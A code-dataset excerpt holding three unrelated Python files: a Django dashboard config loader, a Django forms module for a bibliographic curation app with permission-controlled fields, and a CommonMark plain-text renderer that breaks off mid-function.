content stringlengths 5 1.05M |
|---|
import json
from django.conf import settings
import os
from csv import reader
from mechanism.reactions import reaction_musica_names
from dashboard.save import initial_conditions_file_to_dictionary
config_path = os.path.join(settings.BASE_DIR, "dashboard/static/config")
def option_setup():
with open(os.path.join(config_path, 'options.json')) as f:
data = json.loads(f.read())
return data
def ini_cond_setup():
with open(os.path.join(config_path, 'initials.json')) as f:
data = json.loads(f.read())
return data
def display_evolves():
with open(os.path.join(config_path, 'my_config.json')) as f:
config = json.loads(f.read())
e = config['evolving conditions']
evolving_conditions_list = e.keys()
file_header_dict = {} #contains a dictionary w/ key as filename and value as header of file
for i in evolving_conditions_list:
if '.csv' in i or '.txt' in i:
path = os.path.join(os.path.join(settings.BASE_DIR, "dashboard/static/config"), i)
with open(path, 'r') as read_obj:
csv_reader = reader(read_obj)
list_of_rows = list(csv_reader)
try:
file_header_dict.update({i:list_of_rows[0]})
except IndexError:
file_header_dict.update({i:['EMPTY FILE']})
elif '.nc' in i:
file_header_dict.update({i:['NETCDF FILE']})
return file_header_dict
|
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import str
from builtins import object
from django import forms
from django.http import QueryDict
from isisdata.models import *
from isisdata import export # This never gets old...
from isisdata import export_authority
from curation import actions
import rules
class CCRelationForm(forms.ModelForm):
subject = forms.CharField(widget=forms.HiddenInput(), required=True)
object = forms.CharField(widget=forms.HiddenInput(), required=True)
"""We will set these dynamically in the rendered form."""
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
INCLUDES_CHAPTER = 'IC'
INCLUDES_SERIES_ARTICLE = 'ISA'
INCLUDES_CITATION_OBJECT = "ICO"
REVIEWED_BY = 'RB'
RESPONDS_TO = 'RE'
ASSOCIATED_WITH = 'AS'
TYPE_CHOICES = (
(INCLUDES_CHAPTER, 'Includes Chapter'),
(INCLUDES_SERIES_ARTICLE, 'Includes Series Article'),
(INCLUDES_CITATION_OBJECT, 'Includes'),
(ASSOCIATED_WITH, 'Is Associated With'),
(REVIEWED_BY, 'Is Reviewed By')
)
type_controlled = forms.ChoiceField(choices=TYPE_CHOICES)
def __init__(self, *args, **kwargs):
super(CCRelationForm, self).__init__(*args, **kwargs)
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
def clean(self):
super(CCRelationForm, self).clean()
subject_id = self.cleaned_data.get('subject', None)
if subject_id:
self.cleaned_data['subject'] = Citation.objects.get(pk=subject_id)
object_id = self.cleaned_data.get('object', None)
if object_id:
self.cleaned_data['object'] = Citation.objects.get(pk=object_id)
class Meta:
model = CCRelation
fields = [
'type_controlled', 'data_display_order', 'subject',
'object', 'record_status_value', 'record_status_explanation',
'administrator_notes', 'record_history',
]
labels = {
'administrator_notes': 'Staff notes'
}
class ACRelationForm(forms.ModelForm):
authority = forms.CharField(widget=forms.HiddenInput(), required=False)
citation = forms.CharField(widget=forms.HiddenInput(), required=False)
"""We will set these dynamically in the rendered form."""
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
type_controlled = forms.ChoiceField(choices=ACRelation.TYPE_CHOICES, required=False)
confidence_measure = forms.TypedChoiceField(**{
'choices': [
(1.0, 'Certain/very likely'),
(0.5, 'Likely'),
(0.0, 'Unsure'),
],
'coerce': float,
'required': True,
})
class Meta(object):
model = ACRelation
fields = [
'type_controlled',
'name_for_display_in_citation', 'data_display_order',
'confidence_measure', 'authority', 'citation',
'record_status_value', 'record_status_explanation',
'administrator_notes', 'record_history'
]
labels = {
'administrator_notes': 'Staff notes',
}
def __init__(self, *args, **kwargs):
super(ACRelationForm, self).__init__(*args, **kwargs)
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
def clean(self):
super(ACRelationForm, self).clean()
authority_id = self.cleaned_data.get('authority', None)
if authority_id:
self.cleaned_data['authority'] = Authority.objects.get(pk=authority_id)
else:
self.cleaned_data['authority'] = None
citation_id = self.cleaned_data.get('citation', None)
if citation_id:
self.cleaned_data['citation'] = Citation.objects.get(pk=citation_id)
else:
self.cleaned_data['citation'] = None
class AARelationForm(forms.ModelForm):
authority_subject = forms.CharField(widget=forms.HiddenInput(), required=False)
authority_object = forms.CharField(widget=forms.HiddenInput(), required=False)
"""We will set these dynamically in the rendered form."""
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
type_controlled = forms.ChoiceField(choices=AARelation.TYPE_CHOICES, required=False)
confidence_measure = forms.TypedChoiceField(**{
'choices': [
(1.0, 'Certain/very likely'),
(0.5, 'Likely'),
(0.0, 'Unsure'),
],
'coerce': float,
'required': False,
})
class Meta(object):
model = AARelation
fields = [
'type_controlled', 'aar_type',
'confidence_measure', 'subject', 'object',
'record_status_value', 'record_status_explanation',
'administrator_notes', 'record_history'
]
labels = {
'administrator_notes': 'Staff notes',
}
def __init__(self, *args, **kwargs):
super(AARelationForm, self).__init__(*args, **kwargs)
self.fields['subject'].required=False
self.fields['object'].required=False
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
if not self.fields['authority_subject'].initial and self.instance.subject:
self.fields['authority_subject'].initial = self.instance.subject.id
if not self.fields['authority_object'].initial and self.instance.object:
self.fields['authority_object'].initial = self.instance.object.id
def clean(self):
super(AARelationForm, self).clean()
if self.cleaned_data.get('aar_type', None):
self.cleaned_data['type_controlled'] + self.cleaned_data.get('aar_type').base_type
authority_subject_id = self.cleaned_data.get('authority_subject', None)
if authority_subject_id:
self.cleaned_data['subject'] = Authority.objects.get(pk=authority_subject_id)
else:
self.cleaned_data['subject'] = None
authority_object_id = self.cleaned_data.get('authority_object', None)
if authority_object_id:
self.cleaned_data['object'] = Authority.objects.get(pk=authority_object_id)
else:
self.cleaned_data['object'] = None
class ISODateValueForm(forms.ModelForm):
value = forms.CharField()
def __init__(self, *args, **kwargs):
super(ISODateValueForm, self).__init__(*args, **kwargs)
instance = kwargs.get('instance')
if instance and not self.is_bound:
self.fields['value'].initial = instance.__unicode__()
def clean_value(self):
value = self.cleaned_data['value']
try:
ISODateValue.convert(value)
except:
raise forms.ValidationError('Please enter an ISO8601-compliant date.')
return value
def save(self, *args, **kwargs):
self.instance.value = self.cleaned_data.get('value')
super(ISODateValueForm, self).save(*args, **kwargs)
class Meta(object):
model = ISODateValue
fields = []
class AuthorityValueForm(forms.ModelForm):
value = forms.CharField(label="Authority ID")
authority_name = forms.CharField(label='Name of stored authority')
def __init__(self, *args, **kwargs):
super(AuthorityValueForm, self).__init__(*args, **kwargs)
instance = kwargs.get('instance')
if instance and not self.is_bound:
self.fields['value'].initial = instance.pk
self.fields['authority_name'].initial = instance.value.name
self.fields['authority_name'].widget.attrs['readonly'] = True
def clean_value(self):
value = self.cleaned_data['value']
try:
value = Authority.objects.get(id=value)
except:
raise forms.ValidationError('Authority record does not exist.')
return value
def save(self, *args, **kwargs):
self.instance.value = self.cleaned_data.get('value')
super(AuthorityValueForm, self).save(*args, **kwargs)
class Meta(object):
model = AuthorityValue
fields = ['value']
class CitationValueForm(forms.ModelForm):
value = forms.CharField(label="Citation ID", widget=forms.TextInput(attrs={'data-type':'citation_id'}))
citation_name = forms.CharField(label='Name of stored citation', widget=forms.TextInput(attrs={'readonly': True}))
def __init__(self, *args, **kwargs):
super(CitationValueForm, self).__init__(*args, **kwargs)
instance = kwargs.get('instance')
if instance and not self.is_bound:
self.fields['value'].initial = instance.pk
self.fields['citation_name'].initial = instance.value.title_for_display
def clean_value(self):
value = self.cleaned_data['value']
try:
value = Citation.objects.get(id=value)
except:
raise forms.ValidationError('Citation record does not exist.')
return value
def save(self, *args, **kwargs):
self.instance.value = self.cleaned_data.get('value')
super(CitationValueForm, self).save(*args, **kwargs)
class Meta(object):
model = CitationValue
fields = ['value']
class PartDetailsForm(forms.ModelForm):
extent_note = forms.CharField(widget=forms.widgets.Textarea({'rows': '1'}), required=False)
def __init__(self, user, citation_id=None, *args, **kwargs):
super(PartDetailsForm, self).__init__( *args, **kwargs)
self.user = user
self.citation_id = citation_id
self.fields['volume_begin'].widget.attrs['placeholder'] = "Begin #"
self.fields['volume_end'].widget.attrs['placeholder'] = "End #"
self.fields['volume_free_text'].widget.attrs['placeholder'] = "Volume"
self.fields['issue_begin'].widget.attrs['placeholder'] = "Begin #"
self.fields['issue_end'].widget.attrs['placeholder'] = "End #"
self.fields['issue_free_text'].widget.attrs['placeholder'] = "Issue"
self.fields['page_begin'].widget.attrs['placeholder'] = "Begin #"
self.fields['page_end'].widget.attrs['placeholder'] = "End #"
self.fields['pages_free_text'].widget.attrs['placeholder'] = "Pages"
self.fields['extent'].widget.attrs['placeholder'] = "Extent"
self.fields['extent_note'].widget.attrs['placeholder'] = "Extent note"
if citation_id:
can_update = rules.test_rule('can_update_citation_field', user, ('part_details', citation_id))
can_view = rules.test_rule('can_view_citation_field', user, ('part_details', citation_id))
set_field_access(can_update, can_view, self.fields)
class Meta(object):
model = PartDetails
exclude =['volume', 'sort_order']
def _get_validation_exclusions(self):
exclude = super(PartDetailsForm, self)._get_validation_exclusions()
# remove fields that user isn't allowed to modify
if self.citation_id:
can_update = rules.test_rule('can_update_citation_field', self.user, ('part_details', self.citation_id))
can_view = rules.test_rule('can_view_citation_field', self.user, ('part_details', self.citation_id))
for field in self.fields:
if not can_update or not can_view:
exclude.append(field)
return exclude
def set_field_access(can_update, can_view, fields):
for field in fields:
if not can_update:
fields[field].widget.attrs['readonly'] = True
if not can_view:
fields[field] = forms.CharField(widget=NoViewInput())
fields[field].widget.attrs['readonly'] = True
class StubCheckboxInput(forms.widgets.CheckboxInput):
def __init__(self, attrs=None, check_test=None):
super().__init__(attrs, lambda v: v == Citation.STUB_RECORD)
class CitationForm(forms.ModelForm):
abstract = forms.CharField(widget=forms.widgets.Textarea({'rows': '7'}), required=False)
complete_citation = forms.CharField(widget=forms.widgets.Textarea({'rows': '7'}), required=False)
description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
record_history = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
additional_titles = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
edition_details = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
physical_details = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
language = forms.ModelMultipleChoiceField(queryset=Language.objects.all(), required=False)
belongs_to = forms.ModelChoiceField(queryset=Dataset.objects.all(), label='Dataset', required=False)
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
administrator_notes = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False, label="Staff notes")
title = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
subtype = forms.ModelChoiceField(queryset=CitationSubtype.objects.all(), label='Subtype', required=False)
stub_record_status = forms.BooleanField(label='Stub', widget=StubCheckboxInput(), required=False)
class Meta(object):
model = Citation
fields = [
'type_controlled', 'title', 'description', 'edition_details',
'physical_details', 'abstract', 'additional_titles',
'book_series', 'record_status_value', 'record_status_explanation',
'belongs_to', 'administrator_notes', 'record_history', 'subtype',
'complete_citation', 'stub_record_status'
]
labels = {
'belongs_to': 'Dataset',
'administrator_notes': 'Staff notes',
'complete_citation': 'Stub text'
}
def __init__(self, user, *args, **kwargs):
super(CitationForm, self).__init__( *args, **kwargs)
self.user = user
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
# disable fields user doesn't have access to
if self.instance.pk:
self.fields['title'].widget.attrs['placeholder'] = "No title"
self.fields['type_controlled'].widget = forms.widgets.HiddenInput()
if self.instance.type_controlled in [Citation.REVIEW, Citation.CHAPTER, Citation.ARTICLE, Citation.ESSAY_REVIEW]:
self.fields['book_series'].widget = forms.widgets.HiddenInput()
if self.instance.type_controlled in [Citation.THESIS]:
self.fields['book_series'].widget = forms.widgets.HiddenInput()
self.fields['subtype'].queryset = CitationSubtype.objects.filter(related_citation_type=self.instance.type_controlled)
for field in self.fields:
can_update = rules.test_rule('can_update_citation_field', user, (field, self.instance.pk))
if not can_update:
self.fields[field].widget.attrs['readonly'] = True
self.fields[field].widget.attrs['disabled'] = True
can_view = rules.test_rule('can_view_citation_field', user, (field, self.instance.pk))
if not can_view:
self.fields[field] = forms.CharField(widget=NoViewInput())
self.fields[field].widget.attrs['readonly'] = True
self.fields[field].widget.attrs['disabled'] = True
def clean(self):
super(CitationForm, self).clean()
stub_record_status = self.cleaned_data.get('stub_record_status', False)
if stub_record_status:
self.cleaned_data['stub_record_status'] = Citation.STUB_RECORD
else:
self.cleaned_data['stub_record_status'] = None
def _get_validation_exclusions(self):
exclude = super(CitationForm, self)._get_validation_exclusions()
# remove fields that user isn't allowed to modify
if self.instance.pk:
for field in self.fields:
can_update = rules.test_rule('can_update_citation_field', self.user, (field, self.instance.pk))
can_view = rules.test_rule('can_view_citation_field', self.user, (field, self.instance.pk))
if not can_update or not can_view:
exclude.append(field)
return exclude
class LinkedDataForm(forms.ModelForm):
class Meta(object):
model = LinkedData
fields = [
'universal_resource_name', 'resource_name', 'url',
'type_controlled', 'record_status_value',
'record_status_explanation', 'administrator_notes',
'record_history'
]
labels = {
'universal_resource_name': 'URN (link to authority)'
}
def __init__(self, *args, **kwargs):
super(LinkedDataForm, self).__init__(*args, **kwargs)
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
def save(self, *args, **kwargs):
super(LinkedDataForm, self).save(*args, **kwargs)
class NoViewInput(forms.TextInput):
def render(self, name, value, attrs=None):
value = "You do not have sufficient permissions to view this field."
return super(NoViewInput, self).render(name, value, attrs)
class AuthorityForm(forms.ModelForm):
description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
redirect_to = forms.CharField(widget=forms.HiddenInput(), required = False)
record_history = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
belongs_to = forms.ModelChoiceField(queryset=Dataset.objects.all(), label='Dataset', required=False)
class Meta(object):
model = Authority
fields = [
'type_controlled', 'name', 'description', 'classification_system',
'classification_code', 'classification_hierarchy',
'record_status_value', 'record_status_explanation', 'redirect_to',
'administrator_notes', 'record_history', 'belongs_to'
]
labels = {
'belongs_to': 'Dataset',
'administrator_notes': 'Staff notes',
}
def __init__(self, user, *args, **kwargs):
super(AuthorityForm, self).__init__(*args, **kwargs)
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
self.user = user
# disable fields user doesn't have access to
if self.instance.pk:
for field in self.fields:
can_update = rules.test_rule('can_update_authority_field', user, (field, self.instance.pk))
if not can_update:
self.fields[field].widget.attrs['readonly'] = True
can_view = rules.test_rule('can_view_authority_field', user, (field, self.instance.pk))
if not can_view:
self.fields[field] = forms.CharField(widget=NoViewInput())
self.fields[field].widget.attrs['readonly'] = True
def clean(self):
super(AuthorityForm, self).clean()
authority_id = self.cleaned_data['redirect_to']
if authority_id:
self.cleaned_data['redirect_to'] = Authority.objects.get(pk=authority_id)
else:
self.cleaned_data['redirect_to'] = None
def _get_validation_exclusions(self):
exclude = super(AuthorityForm, self)._get_validation_exclusions()
# remove fields that user isn't allowed to modify
if self.instance.pk:
for field in self.fields:
can_update = rules.test_rule('can_update_authority_field', self.user, (field, self.instance.pk))
can_view = rules.test_rule('can_view_authority_field', self.user, (field, self.instance.pk))
if not can_update or not can_view:
exclude.append(field)
return exclude
class CitationTrackingForm(forms.ModelForm):
HSTM_UPLOAD = 'HS'
PRINTED = 'PT'
AUTHORIZED = 'AU'
PROOFED = 'PD'
FULLY_ENTERED = 'FU'
BULK_DATA = 'BD'
TYPE_CHOICES = (
(HSTM_UPLOAD, 'HSTM Upload'),
(PRINTED, 'Printed'),
(AUTHORIZED, 'Authorized'),
(PROOFED, 'Proofed'),
(FULLY_ENTERED, 'Fully Entered'),
(BULK_DATA, 'Bulk Data Update')
)
type_controlled = forms.ChoiceField(required=True,
choices=TYPE_CHOICES)
class Meta(object):
model = Tracking
fields = [
'tracking_info', 'notes', 'type_controlled'
]
class AuthorityTrackingForm(forms.ModelForm):
HSTM_UPLOAD = 'HS'
PRINTED = 'PT'
AUTHORIZED = 'AU'
PROOFED = 'PD'
FULLY_ENTERED = 'FU'
BULK_DATA = 'BD'
TYPE_CHOICES = (
(HSTM_UPLOAD, 'HSTM Upload'),
(PRINTED, 'Printed'),
(AUTHORIZED, 'Authorized'),
(PROOFED, 'Proofed'),
(FULLY_ENTERED, 'Fully Entered'),
(BULK_DATA, 'Bulk Data Update')
)
type_controlled = forms.ChoiceField(required=True,
choices=TYPE_CHOICES)
class Meta(object):
model = AuthorityTracking
fields = [
'tracking_info', 'notes', 'type_controlled'
]
class PersonForm(forms.ModelForm):
description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
def __init__(self, user, authority_id, *args, **kwargs):
super(PersonForm, self).__init__( *args, **kwargs)
self.user = user
self.authority_id = authority_id
if authority_id:
can_update = rules.test_rule('can_update_authority_field', user, ('person', authority_id))
can_view = rules.test_rule('can_view_authority_field', user, ('person', authority_id))
set_field_access(can_update, can_view, self.fields)
class Meta(object):
model = Person
fields = [
'personal_name_last', 'personal_name_first', 'personal_name_suffix',
'personal_name_preferred',
]
def _get_validation_exclusions(self):
exclude = super(PersonForm, self)._get_validation_exclusions()
if self.authority_id:
# remove fields that user isn't allowed to modify
can_update = rules.test_rule('can_update_authority_field', self.user, ('person', self.authority_id))
can_view = rules.test_rule('can_view_authority_field', self.user, ('person', self.authority_id))
for field in self.fields:
if not can_update or not can_view:
exclude.append(field)
return exclude
class RoleForm(forms.ModelForm):
class Meta(object):
model = IsisCBRole
fields = [
'name', 'description',
]
class DatasetRuleForm(forms.ModelForm):
dataset = forms.ChoiceField(required=False)
def __init__(self, *args, **kwargs):
super(DatasetRuleForm, self).__init__( *args, **kwargs)
dataset_values = Dataset.objects.all()
choices = set()
choices.add((None, "No Dataset"))
for ds in dataset_values:
choices.add((ds.pk, ds.name))
self.fields['dataset'].choices = choices
def clean_field(self):
data = self.cleaned_data['dataset']
if data == '':
data = None
return data
class Meta(object):
model = DatasetRule
fields = [
'dataset', 'role'
]
class AddRoleForm(forms.Form):
role = forms.ChoiceField(required=True)
def __init__(self, *args, **kwargs):
super(AddRoleForm, self).__init__( *args, **kwargs)
roles = IsisCBRole.objects.all()
choices = []
for role in roles:
choices.append((role.pk, role.name))
self.fields['role'].choices = choices
class CRUDRuleForm(forms.ModelForm):
class Meta(object):
model = CRUDRule
fields = [
'crud_action'
]
labels = {
'crud_action': 'Allowed Action',
}
class FieldRuleCitationForm(forms.ModelForm):
field_name = forms.ChoiceField(required = True)
def __init__(self, *args, **kwargs):
super(FieldRuleCitationForm, self).__init__( *args, **kwargs)
all_citation_fields = Citation._meta.get_fields()
choices = []
for field in all_citation_fields:
choices.append((field.name, field.name))
choices.sort()
self.fields['field_name'].choices = choices
class Meta(object):
model = FieldRule
fields = [
'field_action', 'field_name',
]
class FieldRuleAuthorityForm(forms.ModelForm):
field_name = forms.ChoiceField(required = True)
def __init__(self, *args, **kwargs):
super(FieldRuleAuthorityForm, self).__init__( *args, **kwargs)
all_authority_fields = Authority._meta.get_fields()
authority_choices = []
for field in all_authority_fields:
authority_choices.append((field.name, field.name))
authority_choices.sort()
self.fields['field_name'].choices = authority_choices
class Meta(object):
model = FieldRule
fields = [
'field_action', 'field_name',
]
class UserModuleRuleForm(forms.ModelForm):
class Meta(object):
model = UserModuleRule
fields = [
'module_action',
]
class AttributeForm(forms.ModelForm):
description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
type_controlled = forms.ModelChoiceField(queryset=AttributeType.objects.all(), required=False)
record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES)
class Meta(object):
model = Attribute
fields = [
'type_controlled',
'description',
'value_freeform',
'record_status_value',
'record_status_explanation',
'record_history'
]
def __init__(self, *args, **kwargs):
super(AttributeForm, self).__init__(*args, **kwargs)
# if self.instance.id:
# self.fields['type_controlled'].widget.attrs['disabled'] = True
if not self.is_bound:
if not self.fields['record_status_value'].initial:
self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
def save(self, *args, **kwargs):
if self.instance.id:
self.fields['type_controlled'].initial = self.instance.type_controlled
return super(AttributeForm, self).save(*args, **kwargs)
class BulkActionForm(forms.Form):
def apply(self, user, filter_params_raw, extra=None):
selected_actions = self.cleaned_data.get('action')
tasks = []
for action_name in selected_actions:
action_value = self.cleaned_data.get(action_name)
extra_data = {
k.split('__')[1]: v for k, v in list(self.cleaned_data.items())
if k.startswith(action_name) and not k == action_name and '__' in k
}
if extra:
extra_data.update(extra)
# Load and instantiate the corresponding action class.
action = getattr(actions, action_name)() # Object is callable.
tasks.append(action.apply(user, filter_params_raw, action_value, **extra_data))
return tasks
# Emulates django's modelform_factory
def bulk_action_form_factory(form=BulkActionForm, **kwargs):
attrs = {} # For the form's Meta inner class.
# For the Media inner class.
media_attrs = {'js': ('curation/js/bulkaction.js', )}
queryset = kwargs.pop('queryset', None)
object_type = kwargs.pop('object_type', 'CITATION')
parent = (object,)
if hasattr(form, 'Meta'):
parent = (form.Meta, object)
Meta = type(str('Meta'), parent, attrs)
form_class_attrs = {'Meta': Meta}
action_choices = []
extra_data = {}
# hack until we also make tracking status work
avail_actions = actions.AVAILABLE_ACTIONS_AUTHORITY if object_type == 'AUTHORITY' else actions.AVAILABLE_ACTIONS
for action_class in avail_actions:
if hasattr(action_class, 'extra_js'):
media_attrs['js'] = tuple(list(media_attrs['js']) + [action_class.extra_js])
if hasattr(action_class, 'get_extra_data'):
extra_data[action_class.__name__] = action_class.get_extra_data(queryset=queryset)
action = action_class()
action_choices.append((action_class.__name__, action.label))
form_class_attrs[action_class.__name__] = action.get_value_field(required=False)
extras = action.get_extra_fields()
if extras:
form_class_attrs.update({'%s__%s' % (action_class.__name__, name): field for name, field in extras})
form_class_attrs['Media'] = type(str('Media'), (object,), media_attrs)
form_class_attrs['extra_data'] = extra_data
form_class_attrs['action'] = forms.MultipleChoiceField(choices=action_choices)
form_class_attrs['filters'] = forms.CharField(widget=forms.widgets.HiddenInput())
return type(form)('BulkChangeForm', (form,), form_class_attrs)
class CitationCollectionForm(forms.ModelForm):
filters = forms.CharField(widget=forms.widgets.HiddenInput())
class Meta(object):
model = CitationCollection
exclude = ('created', 'createdBy', 'citations')
class AuthorityCollectionForm(forms.ModelForm):
filters = forms.CharField(widget=forms.widgets.HiddenInput())
class Meta(object):
model = AuthorityCollection
exclude = ('created', 'createdBy', 'authorities')
class AARSetForm(forms.ModelForm):
class Meta(object):
model = AARSet
fields = ['name', 'description']
class AARelationTypeForm(forms.ModelForm):
class Meta(object):
model = AARelationType
fields = ['name', 'description', 'relation_type_controlled', 'base_type', 'aarset']
class SelectCitationCollectionForm(forms.Form):
collection = forms.ModelChoiceField(queryset=CitationCollection.objects.all())
filters = forms.CharField(widget=forms.widgets.HiddenInput())
class SelectAuthorityCollectionForm(forms.Form):
collection = forms.ModelChoiceField(queryset=AuthorityCollection.objects.all())
filters = forms.CharField(widget=forms.widgets.HiddenInput())
class ExportCitationsForm(forms.Form):
export_name = forms.CharField(help_text='This tag will be added to the export filename')
export_format = forms.ChoiceField(choices=[('CSV', 'Comma-separated values (CSV)'), ('EBSCO_CSV', 'Comma-separated values (CSV) in EBSCO format (disregard column selection below)'), ('ITEM_COUNT', 'Export for Item Counts'), ('SWP_ANALYSIS', "Export for SPW Analysis")])
export_linked_records = forms.BooleanField(label="Export linked records (make sure that the 'Link to Record' Field is selected in the field list)", required=False)
export_metadata = forms.BooleanField(label="Export metadata", required=False)
use_pipe_delimiter = forms.BooleanField(label='Use "||" to separate related authority and citation fields', required=False)
fields = forms.MultipleChoiceField(choices=[(c.slug, c.label) for c in export.CITATION_COLUMNS], required=False)
filters = forms.CharField(widget=forms.widgets.HiddenInput())
# compress_output = forms.BooleanField(required=False, initial=True,
# help_text="If selected, the output"
# " will be gzipped.")
def clean_fields(self):
field_data = self.cleaned_data['fields']
export_type = self.cleaned_data['export_format']
if export_type == 'CSV':
if not field_data:
raise forms.ValidationError("Please select fields to export.")
return field_data
class ExportAuthorityForm(forms.Form):
export_name = forms.CharField(help_text='This tag will be added to the export filename')
export_format = forms.ChoiceField(choices=[('CSV', 'Comma-separated values (CSV)')])
export_metadata = forms.BooleanField(label="Export metadata", required=False)
fields = forms.MultipleChoiceField(choices=[(c.slug, c.label) for c in export_authority.AUTHORITY_COLUMNS])
filters = forms.CharField(widget=forms.widgets.HiddenInput())
class BulkChangeCSVForm(forms.Form):
csvFile = forms.FileField()
NO_CHOICE = None
CREATE_ATTR = 'CRATT'
UPDATE_ATTR = 'UPATT'
CREATE_LINKED_DATA = 'CRLD'
CREATE_ACRELATIONS = 'CRACR'
CREATE_AARELATIONS = 'CRAAR'
CREATE_CCRELATIONS = 'CRCCR'
CREATE_AUTHORITIES = 'CRAUTH'
CREATE_CITATIONS = 'CRCIT'
MERGE_AUTHORITIES = 'MGAUTH'
CHOICES = [
(NO_CHOICE, '-------------'),
(CREATE_ATTR, 'Create Attributes'),
(UPDATE_ATTR, 'Update Elements'),
(CREATE_LINKED_DATA, 'Create Linked Data'),
(CREATE_ACRELATIONS, 'Create ACRelations'),
(CREATE_AARELATIONS, 'Create AARelations'),
(CREATE_CCRELATIONS, 'Create CCRelations'),
(CREATE_AUTHORITIES, 'Create Authorities'),
(CREATE_CITATIONS, 'Create Citations'),
(MERGE_AUTHORITIES, 'Duplicate Authority Merge and Redirect'),
]
action = forms.ChoiceField(choices=CHOICES)
|
# see https://github.com/rtfd/CommonMark-py/blob/master/CommonMark/render/html.py
# for the HTML renderer -- this is just a riff on that.
import re
import commonmark
import commonmark.render.renderer
class RawHtmlNotAllowed(ValueError):
def __init__(self):
super(RawHtmlNotAllowed, self).__init__("Raw HTML cannot be rendered by the plain text renderer.")
class ListBlock:
def __init__(self, list_type, start_value, bullet_char):
self.list_type = list_type
self.value = start_value
self.bullet_char = bullet_char
def __str__(self):
# Does not cause indentation.
return ""
class ItemBullet:
def __init__(self, listblock):
self.listblock = listblock
self.emitted = None
def __str__(self):
# A bullet is emitted exactly once.
if not self.emitted:
if self.listblock.list_type == "bullet":
self.emitted = self.listblock.bullet_char + " "
elif self.listblock.list_type == "ordered":
self.emitted = str(self.listblock.value) + ". "
self.listblock.value += 1
else:
raise ValueError(self.listblock.list_type)
return self.emitted
# After that, it is just emitted as indentation.
else:
return " " * len(self.emitted)
class PlainTextRenderer(commonmark.render.renderer.Renderer):
def __init__(self):
self.setext_heading_chars = ["#", "=", "-"]
self.block_indent = []
def emit_intent(self):
self.lit("".join(str(b) for b in self.block_indent))
def emit_end_block(self, node):
# adapted from the HtmlRenderer
grandparent = node.parent.parent
if grandparent is not None and grandparent.t == 'list' and grandparent.list_data['tight']:
# Within a loose list, don't add a double-newline.
pass
else:
self.emit_intent()
self.cr()
def text(self, node, entering=None):
self.out(node.literal)
def softbreak(self, node=None, entering=None):
self.cr()
self.emit_intent()
def linebreak(self, node=None, entering=None):
self.cr()
self.emit_intent()
def link(self, node, entering):
if entering:
self.link_start = len(self.buf)
else:
text = self.buf[self.link_start:]
if text != node.destination:
self.lit(" <" + node.destination + ">")
def image(self, node, entering):
if entering:
self.lit('[image]')
else:
pass
def emphstronglevel(self, node):
if (node.parent.t in ("emph", "strong") and node is node.parent.first_child):
return self.emphstronglevel(node.parent) + 1
elif node.prv and node.prv.t in ("emph", "strong"):
return self.emphstronglevel(node.prv) + 1
return 0
def emph(self, node, entering):
# same symbol entering & exiting, but must alternate between * and _
# when nested immediately within or following a strong/emph.
if (self.emphstronglevel(node) % 2) == 0:
self.lit("*")
else:
self.lit("_")
def strong(self, node, entering):
# same symbol entering & exiting, but must alternate between * and _
# when nested immediately within or following a strong/emph.
if (self.emphstronglevel(node) % 2) == 0:
self.lit("**")
else:
self.lit("__")
def paragraph(self, node, entering):
if entering:
self.emit_intent()
else:
self.cr()
self.emit_end_block(node)
def heading(self, node, entering):
if entering:
self.emit_intent()
self.heading_start = len(self.buf)
else:
if node.level <= len(self.setext_heading_chars):
heading_len = len(self.buf) - self.heading_start
if heading_len == 0:
# CommonMark requires that the heading still be emitted even if
# empty, so fall back to a setext-style heading.
self.lit("#" * node.level + " ")
else:
self.cr()
self.emit_intent()
self.lit(self.setext_heading_chars[node.level-1] * heading_len)
self.cr()
self.emit_end_block(node)
def code(self, node, entering):
# Just do actual CommonMark here. The backtick string around the literal
# must have one more backtick than the number of consecutive backticks
# in the literal.
backtick_string = "`"
while backtick_string in node.literal:
backtick_string += "`"
self.lit(backtick_string)
if node.literal.startswith("`") or node.literal == "":
# Must have space betweet a literal backtick within the code,
# and if the code is totally empty there must be space between
# the start and end backticks.
self.lit(" ")
self.lit(node.literal) # this is correct as lit() and not out() for CommonMark-compliant output
if node.literal.endswith("`"):
self.lit(" ")
self.lit(backtick_string)
def code_block(self, node, entering):
# open code block
self.emit_intent()
self.emit_code_block_fence(node.literal, node.info)
# each line, with indentation; note that the literal is a literal
# and must not be escaped
self.emit_intented_literal(node.literal)
# close code block
self.emit_intent()
self.emit_code_block_fence(node.literal)
self.emit_end_block(node)
def emit_code_block_fence(self, literal, language=None):
width = max([len(line.replace("\t", " ")) for line in literal.split("\n")])
self.lit("-" * width + "\n")
def emit_intented_literal(self, literal):
lines = literal.split("\n")
while len(lines) > 0 and lines[-1] == "":
